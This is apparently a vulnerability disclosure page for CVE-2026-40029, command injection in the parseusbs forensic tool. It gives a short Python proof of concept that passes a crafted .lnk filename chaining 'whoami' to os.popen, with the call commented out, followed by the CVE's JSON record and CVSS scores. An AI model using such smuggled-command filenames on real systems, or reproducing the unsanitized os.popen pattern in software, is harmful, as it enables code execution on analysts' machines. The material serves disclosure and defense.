CVE-2026-40029

# PoC for CVE-2026-40029: parseusbs OS Command Injection # This PoC demonstrates the vulnerability concept where a malicious filename # containing shell metacharacters is passed to os.popen(). import os # Simulating the vulnerable function in parseUSBs.py def vulnerable_parsing_function(filepath): # The vulnerability lies here: os.popen executes the string in a shell # without sanitizing the input 'filepath'. command_output = os.popen(f"type {filepath}") # Example command return command_output.read() # 1. Attacker creates a malicious file name # The filename includes a semicolon to chain commands and a comment character malicious_filename = "innocent.lnk; whoami; echo 'CVE-2026-40029 Exploited'; #" print(f"[+] Attempting to parse file with name: {malicious_filename}") # 2. The forensic analyst runs the tool on the untrusted input try: # WARNING: Executing this on a vulnerable system would run 'whoami' print("[!] If this were run on the vulnerable software, arbitrary code execution would occur.") # result = vulnerable_parsing_function(malicious_filename) # print(result) except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-40029", "sourceIdentifier": "[email protected]", "published": "2026-04-08T22:16:23.303", "lastModified": "2026-04-13T20:27:50.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "parseusbs before 1.9 contains an OS command injection vulnerability in parseUSBs.py where LNK file paths are passed unsanitized into an os.popen() shell command, allowing arbitrary command execution via crafted .lnk filenames containing shell metacharacters. An attacker can craft a .lnk filename with embedded shell metacharacters that execute arbitrary commands on the forensic examiner's machine during USB artifact parsing."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:khyrenz:parseusbs:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.9", "matchCriteriaId": "7F7B9F1A-2137-42B6-8E28-88D4790F4892"}]}]}], "references": [{"url": "https://github.com/khyrenz/parseusbs/commit/99f05996494e7e41ea0c7e13145ba20eb793e46b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/khyrenz/parseusbs/pull/10", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://mobasi.ai/sentinel", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/parseusbs-command-injection-via-crafted-lnk-filename", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}